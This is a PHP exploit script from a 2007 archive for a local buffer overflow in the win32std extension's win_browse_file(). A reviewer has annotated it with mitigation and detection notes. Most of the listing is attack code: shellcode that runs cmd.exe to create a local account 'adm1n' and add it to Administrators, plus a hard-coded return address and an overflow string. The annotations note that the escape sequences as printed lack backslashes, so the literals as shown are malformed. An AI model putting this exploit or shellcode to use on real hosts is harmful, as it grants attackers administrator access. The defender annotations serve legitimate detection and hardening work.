
# Title : PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)
# Published : 2007-08-22
# Author : NetJackal


<?php

##########################################################
###----------------------------------------------------###
###--------PHP win32std Buffer Overflow Exploit--------###
###----------------------------------------------------###
###-Tested on:-PHP 5.2.3-------------------------------###
###------------Windows XP SP2 Eng----------------------###
###----------------------------------------------------###
###-Note:-Shellcode is hard coded for Win XP SP2 Eng---###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################



# Proof-of-concept for a local buffer overflow reached through win_browse_file(),
# which the banner above attributes to the win32std extension on PHP 5.2.3.
# NOTE(review): the page title spells the extension "win32sti"; the banner and
# the function called here point to win32std -- confirm before using the name
# in an advisory or a detection rule.
#
# Defender summary:
#   * Trigger: an over-long string passed as the third argument of
#     win_browse_file(). Nothing else in the call is unusual.
#   * Reach: "local" -- the caller must already be able to run PHP code on the
#     host. The exposure is therefore hosts that run untrusted scripts (shared
#     hosting, upload-to-execute bugs) with this extension loaded, where native
#     code execution escapes whatever PHP-level restrictions are configured.
#   * Mitigation: do not load php_win32std.dll where untrusted scripts run;
#     otherwise list the extension's functions in disable_functions and move
#     off PHP 5.2.x. The payload relies on fixed addresses for one OS build
#     (see banner), which ASLR on later Windows versions is designed to break,
#     but that is not a substitute for removing the extension.
#   * Detection: cmd.exe / net.exe spawned by the PHP or web-server process;
#     account-management audit events for a new local user and a new member of
#     Administrators (624/636 on XP-era systems, 4720/4732 on later ones);
#     the account name below as an indicator.
#
# NOTE(review): as printed on this page the string literals are plain ASCII
# text, not raw bytes, so the names below describe intent rather than what the
# listing evaluates to.

# Payload. Per the author's note it adds a local account:
#   [user]=>"adm1n" [password]=>"netjackal"
# The readable tail of the hex spells a cmd.exe command line that creates that
# account and adds it to the local Administrators group.
$SC=
"xEBx19x5Ax31xC0x50x88x42x52x52xBBx6Dx13x86".
"x7CxFFxD3xBBxDAxCDx81x7Cx31xC0x50xFFxD3xE8".
"xE2xFFxFFxFFx63x6Dx64x2Ex65x78x65x20x2Fx63".
"x20x6Ex65x74x20x75x73x65x72x20x61x64x6Dx31".
"x6Ex20x6Ex65x74x6Ax61x63x6Bx61x6Cx20x2Fx61".
"x64x64x26x26x6Ex65x74x20x6Cx6Fx63x61x6Cx67".
"x72x6Fx75x70x20x41x64x6Dx69x6Ex69x73x74x72".
"x61x74x6Fx72x73x20x2Fx61x64x64x20x61x64x6D".
"x31x6Ex58";

# Four-byte value placed at the very end of the argument; presumably the
# address meant to replace a saved return address -- specific to the tested
# PHP build and OS named in the banner.
$RET="x70xE6x16x01";

# Final argument: leading padding, the payload, "A" filler, then $RET.
# The lengths (24 and 121) are fixed by the author for the tested target.
$BOMB=str_repeat("x90",24).$SC.str_repeat("A",121).$RET;

# The vulnerable call. $BOMB is the third argument; the remaining arguments
# are ordinary values (1, NULL, NULL and a "*" => "*.*" filter array).
win_browse_file(1,NULL,$BOMB,NULL,array( "*" => "*.*"));
?>
